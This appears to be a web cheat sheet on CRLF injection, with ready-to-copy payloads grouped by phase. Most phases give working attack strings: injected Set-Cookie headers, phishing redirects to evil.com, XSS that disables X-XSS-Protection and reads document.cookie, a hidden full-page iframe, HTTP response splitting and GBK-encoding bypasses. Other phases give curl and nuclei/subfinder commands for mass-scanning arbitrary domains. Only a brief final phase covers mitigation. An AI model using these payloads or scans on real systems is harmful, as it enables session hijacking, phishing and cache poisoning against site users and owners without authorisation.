CRLF Injection
Carriage Return and Line Feed injection. Manipulate HTTP headers and responses.
10 Categories35+ CommandsCopy Ready
Phase 1
Introduction
1CRLF stands for special characters used to denote end of line in HTTP headers
CRLF = Carriage Return (%0d) + Line Feed (%0a)2Basic CRLF injection test payload
%0d%0aX-Injection-Test: injected3Why CRLF Injection is dangerous
Can lead to HTTP response splitting, web cache poisoning, and XSS attacksPhase 2
Basic Header Injection
1Inject custom header - simplest form of CRLF
%0d%0aX-Injection-Test: injected2Inject a Set-Cookie header
%0d%0aSet-Cookie: hacked=true;3Inject HTML content after CRLF sequence
%0d%0a%3Ch1%3EHTML INJECTION%3C/h1%3E%0d%0a%3Cp%3ECRLF Injection PoC%3C/p%3EPhase 3
Redirect/Phishing
1Redirect users to malicious site via Location header
%0d%0aLocation: https://evil.com2Phishing link injection
%0d%0a%0d%0a%3Ca%20href=%22https://example.com/%22%3ELogin Here%20%3C/a%3E3Combined redirect with content type
%0d%0aLocation: http://evil.com%0d%0aContent-Type: text/htmlPhase 4
XSS Injection via CRLF
1Basic XSS payload after CRLF
%0d%0a%0d%0a<script>alert('XSS via CRLF')</script>2Disable XSS protection and inject script
%0d%0aContent-Type: text/html%0d%0aX-XSS-Protection: 0%0d%0a%0d%0a<script>alert(document.cookie)</script>3SVG-based XSS payload
%0d%0a%0d%0a%3Csvg onload=alert(1)%3E4Bypass XSS protection with prompt()
%0d%0aX-XSS-Protection: 0%0d%0a%0d%0a%3Cimg src=x onerror=prompt(1)%3EPhase 5
IFrame Injection
1Inject hidden iframe redirecting to NASA (as example)
%0d%0a%0d%0a%3Ciframe src=%22https://www.nasa.gov/%22 style=%22border:0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%%22%3EPhase 6
HTTP Response Splitting
1HTTP response splitting - create fake response
/vulnerable-endpoint?q=abc%0d%0aContent-Length: 0%0d%0a%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a<script>alert('Split!')</script>2Test with curl - inject Set-Cookie header
curl -I "https://example.com/%0d%0aSet-Cookie:crlf=injected;"Phase 7
Bypass Techniques
1GBK encoding bypass payload
/%0d%0aSet-Cookie:whoami=coffinxp2GBK-encoded CRLF bypass
https://example.com/%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi3Double CRLF for body injection
%0d%0a%0d%0a<script>alert(1);</script>4Full chain: CRLF → XSS with protection bypass
%0d%0aContent-Type: text/html%0d%0aX-XSS-Protection: 0%0d%0a%0d%0a<script>alert('XSS');</script>Phase 8
Testing with cURL
1Test single URL with curl -I (headers only)
curl -I "https://example.com/%0d%0aSet-Cookie:crlf=injected;"2Test with query parameter
curl -I "https://example.com/page=home%0d%0aSet-Cookie:crlf=injected;"3Scan with Nuclei CRLF template
nuclei -u https://target.com -t crlf.yaml4Mass scan subdomains for CRLF vulnerabilities
subfinder -d domain.com -all | nuclei -t crlf.yamlPhase 9
Mass Scanning with Loxs
1Step 1: Capture request with Burp Suite
Intercept request in Burp (e.g., GET /?page=home)2Step 2: Inject CRLF in Repeater
Send to Repeater, modify: page%0d%0aSet-Cookie:crlf=injected3Step 3: Check if injection succeeded
Observe response for new headers like Set-Cookie: crlf=injected4Loxs tool for mass CRLF scanning
https://github.com/coffinxp/loxsPhase 10
Nuclei Templates
1Basic Nuclei CRLF scan
nuclei -u https://target.com -t crlf.yaml2Reference: CoffinXP CRLF Nuclei template
https://github.com/coffinxp/nuclei-templates/blob/main/crlf.yaml3Scan list of targets and save results
cat targets.txt | nuclei -t crlf.yaml -o crlf-results.txtPhase 11
Mitigation
1Remove CR and LF characters from any user input reflected in headers
Sanitize and Validate Input: Strip \r and \n from user input2Use well-tested libraries for HTTP header handling
Use Safe Functions: Avoid manual header construction3Properly encode user data before putting in HTTP headers
Output Encoding: Encode special characters in headers4Reference: HackTricks CRLF Injection guide
https://hacktricks.wiki/en/pentesting-web/crlf-0d-0a.html5Reference: PortSwigger Response Queue Poisoning
https://portswigger.net/web-security/request-smuggling/response-queue-poisoningTools